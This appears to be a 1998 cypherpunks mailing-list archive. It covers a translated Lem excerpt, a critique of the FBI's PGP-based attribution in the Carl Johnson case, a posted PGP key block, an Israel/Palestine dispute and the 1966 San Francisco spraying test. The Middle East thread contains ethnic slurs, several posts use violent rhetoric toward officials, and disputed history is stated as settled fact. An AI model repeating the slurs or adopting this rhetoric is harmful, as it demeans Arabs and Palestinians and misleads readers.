>shakespeare" in which he found some patterns in 
>shakespearean texts that might tend to suggest
>some codes were embedded in it.

In what sense? Most of the time, plain old lit analysis is looking for
"keys" and then applying them to "unlock" the "hidden message". An allegory
is a simple substitution cipher, and then it goes all the way up to lit
equivalents of one time pads and steganography (say, 'Lolita' or Frank
O'Hara's poetry).

Concerning Shakespeare, I thought those involved in this discussion might
be amused by the following. I would have posted it earlier but didn't have
the book at hand, and then Lem's prose isn't particularly friendly for the
translator. It's all taken out of context, but will speak for itself, I am
sure.

--------------

STANIS&Lstrok;AW LEM
DIARY FOUND IN A BATHTUB
(chapter IV, excerpt)


	'Here goes,' I said at last, opening my eyes. 'My ears have yet not
drunk a hundred words of that tongue's utterance, yet I know the sound. Art
thou not Romeo?'
	'Fine.'
	The captain punched keys briskly, typing in the line I offered. A slot
that looked like an ancient letterbox began spitting out paper ribbon which
spun slowly in the air. Captain Prandtl held it gently and handed it to me.
I held the tip of the ribbon, waiting patiently. The paper snaked out of
the slot inch by inch and when I tugged at it carefully I could feel the
feeding mechanism vibrate. Suddenly, the barely perceptible tremor ceased
and the ribbon spun on, blank. I held it to my eyes.
	'BAS TARD MAT HEWS BAS TARD DRAW HIM & QUARTER WITH HOLY DE LIGHT MAT
HEWS PIG SEED MATH HEWS MATH'.
	'And what is this?' I asked, not even trying to conceal my dismay. The
captain nodded.
	'I presume that when he wrote the scene, Shakespeare was unfavourably
disposed towards a man named Mathews. . . and encoded the sentiment in the
lines of his play.'
	'You expect me to believe that? Do you mean to say that he deliberately
filled this wondrous, lyrical passage with crude interjections at some
Mathews person?'
	'I never said he did so deliberately. A code is a code, no matter what
the author's intent.'
	'Do you mind?' I asked. I approached the control panel and keyed in the
freshly obtained plaintext myself. The ribbon moved again, twisting into a
spiral. I caught a brief, peculiar smile on Prandtl's lips, but he didn't
say a word.
	'THAT ASS YEAH HER ASS FUN FAT ASS FUN FAT YEAH ASS HER ASS HEY THAT
FAT ASS' - read the tidily printed syllables.
	'What is this?' I demanded. 'What is it?!'
	'Another layer. Well, what did you expect? We've exposed a deeper layer
of the psyche of a 17th century Englishman, plain and simple.'
	'This cannot be! You're telling me this beautiful poem is nothing but a
vessel to conceal some pigs and asses?! And that if you feed the most
sublime literary achievements, pinnacles of human genius, immortal epics,
sagas - it will all come out hodgepodge?'
	'Hodgepodge it is, mister. Art... literature... do you realise what
their purpose is? To divert attention!'
	'From what?'
	'You don't know?'
	'I don't.'
	'That's too bad. You ought to know. What are you doing here, then?!'
	I didn't answer. With skin on his face taut like a tent's canvas
stretched over sharp rocks, he continued in monotone:
	'A broken code remains a code. Under the eye of a professional
cryptographer it will shed one moult after another. It is inexhaustible. It
has no end nor bottom. You can delve into progressively deeper,
progressively more arcane strata, but this journey never terminates.'

--------------

(This 1960 novel is available in English translation, hopefully better than
my attempt here, as "Diary Found in a Bathtub", though i *really* should be
called The (Original) Puzzle Palace, 'coz that's what it's about. It's
Kafka plus David Lynch plus TCMay rolled in one :)

.marek


-- 
General Frenetics, Discorporated: http://www.lodz.pdi.net/~eristic/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 9 Sep 1998 13:11:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Carl Johnson Warrant and Complaint
Message-ID: <199809091550.LAA03183@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Tim May <tcmay@got.net>
   >
   >   As I'd been deleting nearly all of Toto's stuff unread, I missed all the
   >   stuff about (allegedly) threatening to bomb the RCMP.

That's probably true for most of us...it was an unbelievable volume of crap
he sent the list. (as opposed to my crap ;-)

   >   Best to leave rants at the general, protected speech level, and to not get
   >   into specifics of names and working habits of agents.

For example:

   #  Date: Mon, 7 Sep 1998 22:39:01 -0700
   #  To: cypherpunks@cyberpass.net
   #  From: Tim May <tcmay@got.net>
   #  Subject: Tax silliness
   #  
   #  Fox News is reporting that the IRS has said it may seek to
   #  assess "gift taxes" if the guy who recovered Mark McGwire's 61st home
   #  baseball gives the ball back to Mark McGwire.
   #  
   #  Those fuckers in D. C. need to be put out of our misery.

Yeah, much better, Tim. ;-)

But don't start holding rallies and saying it in public in NYC,
or Rudolph Giuliani might have you arrested.

----

http://jya.com/usa-v-cej-wc.htm

>    8. On December 9, 1997, an anonymous message was posted to the
>    Cypherpunks Internet mail group with the subject listed as "Encrypted
>    InterNet DEATH THREAT!!! / ATTN: Ninth District Judges / PASSWORD:
>    sog"[.] The body of the message was encrypted with the publicly
>    available encryption software PGP, and was initially unreadable. Using
>    PGP software and the password shown in the subject line of the
>    message, I was able to decrypt the message, which contained a
>    rambling, five-page statement, including the following:

That would appear to be this post:

   http://www.inet-one.com/cypherpunks/dir.97.12.04-97.12.10/msg00356.html

Entirely unexplained is how one goes from passphrase "sog" (Shit on government?)
to decrypting the PGP message.

What public or private key was used?

>    9. I noted that this message contained a PGP digital signature. From
>    my training and experience, I am aware that this digital signature is
>    used as a way to authenticate digital documents to make sure that they
>    are authored by the purported author and that no one has tampered with
>    them. When I checked the signature using only PGP software, the PGP
>    program was unable to identify it.

What key...?

>    Only July 1, 1998, Royal Canadian
>    Mounted Police (RCMP) Investigator Steve Foster provided me with a PGP
>    "Secret Key Ring" which he stated he had obtained from a computer
>    which Canadian Customs authorities had seized from an individual by
>    the name of CARL EDWARD JOHNSON. [A "secret key ring" is a
>    user-generated code which allows for the encryption (and later
>    authentication) of computer-generated documents.] When I checked the
>    digital signature on the Internet death threat using the PGP software
>    and JOHNSON'S secret key ring, the computer identified the signature
>    as one of the signature keys stored in JOHNSON'S computer. Because
>    both the "private" and "public" portions of the "key" were stored on
>    JOHNSON'S computer, the message can be authenticated as having been
>    generated by the person who possessed this "secret key" and knew the
>    correct password. In other words, only the person possessing the
>    secret key found on JOHNSON'S computer could have generated the "death
>    threat" message.

Sparky got it wrong.

Many people could have the same public/secret key pairs, all they
have to do is give them out.

And you don't authenticate messages with the "secret key" in standard use.

This person seems to have no clue, after months of tracking, how
basic public key encryption software works.

In fact, the key ring could be edited to have a fake secret key
and the public key that works as the digital signature for the
posted message.

More questions: did they get the passphrase for his computer's
PGP secret key? How? And why did RCMP customs seize his computer?

---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 9 Sep 1998 13:04:42 +0800
To: Petro <petro@playboy.com>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03110703b21c4777ca38@[206.189.103.244]>
Message-ID: <199809091801.OAA04010@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03110703b21c4777ca38@[206.189.103.244]>, on 09/09/98 
   at 09:58 AM, Petro <petro@playboy.com> said:

>At 11:25 PM -0500 9/8/98, William H. Geiger III wrote:
>>-----BEGIN PGP SIGNED MESSAGE-----
>>
>>In <v03110710b21b6a259806@[206.189.103.244]>, on 09/08/98
>>   at 06:17 PM, Petro <petro@playboy.com> said:
>>
>>>	No, more like a get off our fucking land.
>>
>>Sure thing, and where you live, exactly who's land was it before you got
>>there?

>	Point is, the "Arabs" didn't start it, the UN/European leaders (US, UK,
>FR, and RU) did.

Both the Palestinians and the Jews living in Trans-Jordan wanted their own
country. The UN resolution divided up the land based on population and
gave each group their own country. Israel declared their independence, the
Palestinians listened to the Grand Mufti and join in the holy war to wipe
out the Jews. The Arabs lost, too bad, game over.

And interesting note to the whole palestinian "issue" is that the majority
of the population of Jordan is palestinian!! And long before the Intifada
the PLO tried to take over the government of Jordan and were embroiled in
civil war for most of the 60's and early 70's. The Jordanian Arabs finally
kick the PLO out in the early 70's (71 maybe 72).


>	If I move you off your property at the point of a gun, should I expect
>you to _like_ it, even if I gave you what I consider "fair market value"?

This re-wright of history might give you warm fuzzies but no one was moved
at gun point off their land (at least not until the Arabs started the
war). The Jews that emigrated to Trans-Jordan/Palestine *purchased* the
land from the Arabs that were living there. Even after the war the
majority of palestinians left on their own.

None of the current Arab countries existed until the British carved up
their conquered territory after WWI. If Israel is not "legitimate" because
of UK/UN involvement does it follow that all of the Arab states that were
formed at this time are also illegitimate? Perhaps we should should
re-unite the Ottoman Empire? How far back in history do you want to go to
find the "legitimate" territorial boundaries? Persian? Roman? Israel?
Egyptian? Sumerian?

I find it quite hypocritical of Americans who see the Israelites as
occupiers and oppressors but would be outraged at calls to give back the
south-west to Mexico. Tim, you want to give your ranch to some Mexican
family since the Americans took that land from them? but then the mexicans
would have to give that land back to some deserving "native" Americans as
they took that land from them. But then again we would have to sift
through the thousands of years of tribal warfare and migration to find the
one true owners of the land.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Windows with bullet-proof glass.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfbEUI9Co1n+aLhhAQGMYgP/Wy+8lVZ6b1YiadmpJ2J/chGcj0NoFbp9
uQhCtPoV2017EdU9c0AcI1PtJ+Bat3wNrZsBMgcnRxA+elgBLe9EbI7kCLIiTr6d
8Kv1stRtd2UPcAoqbJR0EBKtGaryfZY1TzCC2SBbKJUi8pJnfET20wj4Trihw+jh
lSpcGvvHVjg=
=jXCe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 9 Sep 1998 14:16:59 +0800
To: Anonymous <nobody@anon.olymp.org>
Subject: Carl Johnson's private key
In-Reply-To: <ed4d64ff287d4e98c0e76cdc3d0e33cf@anonymous>
Message-ID: <Pine.GSO.3.95.980909120926.27131W-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



I make that point in my article, but have not seen truthmonger's private
key posted. Care to forward it to me?

http://cgi.pathfinder.com/netly/0,2326,201980909-14593,00.html


On Wed, 9 Sep 1998, Anonymous wrote:

> Dear Mr Gordon,
> 
>    When I checked the
>    digital signature on the Internet death threat using the PGP software
>    and JOHNSON'S secret key ring, the computer identified the signature
>    as one of the signature keys stored in JOHNSON'S computer. Because
>    both the "private" and "public" portions of the "key" were stored on
>    JOHNSON'S computer, the message can be authenticated as having been
>    generated by the person who possessed this "secret key" and knew the
>    correct password. In other words, only the person possessing the
>    secret key found on JOHNSON'S computer could have generated the "death
>    threat" message.
> 
> Why would you claim only one person possessed the secret key? As you
> doubtlessly know, some of the TruthMonger secret keys have been posted
> to Cypherpunks anonymously. This is not authentication. Thank you.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 9 Sep 1998 14:15:46 +0800
To: Petro <petro@playboy.com>
Subject: Re: Carl Johnson Warrant and Complaint
In-Reply-To: <v03110700b21c426498f5@[206.189.103.244]>
Message-ID: <Pine.GSO.3.95.980909121406.27131X-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, there's a little more to the "bomb" incident than that. Read
tomorrow's Netly News report on the Nutly News bomber for more info...

-Declan


On Wed, 9 Sep 1998, Petro wrote:

> 
> At 8:40 PM -0500 9/8/98, Eric Cordian wrote:
> >> Thanks to anonymous we offer the arrest warrant and
> >> complaint against Carl Edward Johnson:
> >
> >I conclude:
> >
> >A. There actually exist federal investigators who have nothing
> >   better to do with their lives than read the complete writings
> >   of the Performance Artists Sometimes Known as "Toto," and
> >   engage in endless mental masturbation over the hidden messages
> >   they imagine to be contained therein.
> 
> 	He <allegedly allegedly allegedly> planted a bomb. Like Mr. Bell,
> this is a very dumb thing to do, especially when the bomb didn't go off.
> 
> 
> >B. When writing parody on the subject of AP, it is best not to
> >   employ the names of actual federal slackers, lest the clueless
> >   investigators actually believe them to be targeted in some fashion.
> 
> 	If they had a sense of humor, they wouldn't work for the government.
> 
> petro@playboy.com----for work related issues. I don't speak for Playboy.
> petro@bounty.org-----for everthing else.      They wouldn't like that.
>                                               They REALLY
> Economic speech IS political speech.          wouldn't like that.
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 9 Sep 1998 15:42:02 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: radio net (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284623@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




So much for "no domestic crypto restrictions." I really hate when people
say that, there are plenty, and export restrictions on cryptography
software and cryptography in software DOES indirectly but substantially
affect the availability and cost of domestic encryption, not to mention
that most people download export-grade crypto from the web for
convenience.

Isn't there a similar ban on encryption-capable telephones and other
electronic devices (other than computers).

	Matt


> > The FCC prohibits the transmission of encrypted data via 
> > analog or digital signals by amateurs.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimg@mentat.com (Jim Gillogly)
Date: Wed, 9 Sep 1998 15:06:11 +0800
To: declan@well.com
Subject: Re: Carl Johnson's private key
Message-ID: <199809092006.NAA10324@zendia.mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



Declan skribis:
> I make that point in my article, but have not seen truthmonger's private
> key posted. Care to forward it to me?

I stopped paying attention to most of Truthmonger's spew, but did
collect one private key it posted, under the name "Earmonger", since I
was doing PGP experiments at the time.  I think this one doesn't have
an associated passphrase, which would make forging with it quite
simple.  I sort of think more of its private keys were posted, but I
didn't keep any others.  This does, however, establish a pattern of
behavior suggesting it didn't keep private keys strictly private.

IIRC many of TM's messages were simply file-encrypted with an openly
posted passphrase, which doesn't take a rocket scientist to crack.

	Jim Gillogly

--------------------------------------------

Earmonger key, clipped last year:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Personal Privacy 5.0

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
AJ49fXSrtX0w17W0gCe7BCvjXkRP7Q==
=SVmn
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 15:06:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03130305b21bb44e5bb2@[209.66.100.149]>
Message-ID: <v03130300b21c8c598f73@[209.66.100.149]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:25 AM -0700 9/9/98, William H. Geiger III wrote:


>After the various battles of this 50 year war large percentages of the
>Palestinian population left Israelie held territory, but this had more to
>do with the Arab leaders calling for them to do so (and their not wanting
>to live under Israelie rule) than it did with the Jews pushing them out.


Yes, many farmers and others left the war zone  in 1948 to stay with
relatives and friends and such in safer areas. Can anyone blame them?

Ah, but now they and their children and grandchildren and
great-grandchildren live in tents in refugee camps for a simple reason:
they were not allowed to return to their homes and land.

Did this vacation in Jordan or Egypt or Lebanon or wherever mean they lost
the title to their homes and land? Apparently the newly arrived transplants
from Poland and Latvia and such felt this to be the case.

This is comparable to my going to Oregon to escape the Reconquista Wars in
California, and returning a few months later to find the borders sealed.
(Issues that those who departed may have fallen behind in mortgage payments
and had their farms repossesed by banks, etc., are clearly separable...and
minor, from my readings of Middle Eastern history.)

"You left your land. Enjoy your life in the tent camp at the
Oregon-California border. Meanwhile, your ranch is now my ranch. Oh, and
could give me all of your spare keys? And how does the sprinkler system
work?"

Israel is based on moral bankruptcy. The supposed guilt of the West (huh?
we didn't gas the Jews, and we lost millions of lives fighting Hitler) led
to the "ragheads" being kicked off their land.

--Tim May




"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chatski carl <chatski@gl.umbc.edu>
Date: Wed, 9 Sep 1998 12:17:59 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: A question about gas warfare in San Fran in '66...
In-Reply-To: <199809080109.UAA06813@einstein.ssz.com>
Message-ID: <Pine.SGI.3.96A.980909123416.8520A-100000@umbc9.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 7 Sep 1998, Jim Choate wrote:
> .... on some
> sort of bio-weapon test that occurred in '66 in San Francisco. He is
> claiming that deaths resulted.
> Anyone have a clue what he's talking about?

He is probably talking about a test run by the CIA, Navy Etc.

A navy ship in the bay sprayed SF with a 'simulated' BW agent ( Serratia
marcescens - If I remember correctly ).  This was not designed to hurt
people but to see the spread of an aerosolized agent in a real city. 
Monitoring collectors were set up all over the city including in schools
etc.

Several days after the spraying started, in one hospital ( connected with
Stanford I think ), where there was a ward with a number of catheterized
men, some dozen or so men became seriously ill with Serratia infections,
and 2 died.  There was never a case of Serratia infection before this
time.  The military people conducting the experiment did not inform the
hospital physicians even after the men became ill! 



- Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 9 Sep 1998 15:15:29 +0800
To: Jim Gillogly <jimg@mentat.com>
Subject: Re: Carl Johnson's private key
In-Reply-To: <199809092006.NAA10324@zendia.mentat.com>
Message-ID: <Pine.GSO.3.95.980909131408.8451E-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Hmm. I grabbed the key below and compared it to the "death threat" post
sent on Tuesday, 09 Dec 97 13:51:52 EST. Not a match.

-Declan

PS: Hello to my fans in domestic survelliance!

On Wed, 9 Sep 1998, Jim Gillogly wrote:

> Declan skribis:
> > I make that point in my article, but have not seen truthmonger's private
> > key posted. Care to forward it to me?
> 
> I stopped paying attention to most of Truthmonger's spew, but did
> collect one private key it posted, under the name "Earmonger", since I
> was doing PGP experiments at the time.  I think this one doesn't have
> an associated passphrase, which would make forging with it quite
> simple.  I sort of think more of its private keys were posted, but I
> didn't keep any others.  This does, however, establish a pattern of
> behavior suggesting it didn't keep private keys strictly private.
> 
> IIRC many of TM's messages were simply file-encrypted with an openly
> posted passphrase, which doesn't take a rocket scientist to crack.
> 
> 	Jim Gillogly
> 
> --------------------------------------------
> 
> Earmonger key, clipped last year:
> 
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: PGP for Personal Privacy 5.0
> 
> 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
> AJ49fXSrtX0w17W0gCe7BCvjXkRP7Q==
> =SVmn
> -----END PGP PUBLIC KEY BLOCK-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 9 Sep 1998 13:41:08 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03130305b21bb44e5bb2@[209.66.100.149]>
Message-ID: <199809091840.OAA04706@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03130305b21bb44e5bb2@[209.66.100.149]>, on 09/08/98 
   at 09:40 PM, Tim May <tcmay@got.net> said:

>And it wouldn't have happened had the victorious superpowers decided the
>sand niggers in Palestine could be kicked off their land. (I have no beef
>with those Jews who peacefully bought land in Palestine prior to this
>mass resettlement.)

Sorry Tim, you need to re-check your history.

No one was kicked off their land until *after* war broke out in '45. All
land occupied by the Jews before that was *purchased* from the Arabs
living there. There was also a large percentage of land that was either
desert or swaps that was reclaimed by the Jews and turned into productive
farm land. Tel Aviv was nothing but sand and scrub brush before the Jews
started building there (there was the Ancient city of Jaffo which Tel Aviv
has now encompassed but it took decades of expansion before Tel Aviv
reached that far south).

After the various battles of this 50 year war large percentages of the
Palestinian population left Israelie held territory, but this had more to
do with the Arab leaders calling for them to do so (and their not wanting
to live under Israelie rule) than it did with the Jews pushing them out.

Similar migrations were seen when India and Pakistan were created. Large
portions of Moslem population that were living in India moved to Pakistan
despite Ghandi's calls for them to stay.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: One man's Windows are another man's walls.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfbNiY9Co1n+aLhhAQGZ2AQAgWGUujzGbVvq6uhqnE4fEabsvZCJiYqP
J5MCk3+Z/FJ/ufV37pOlDlBjApPBl87kVmrDdbzlYSRizSsF5Y2dttJ+X5gskeWp
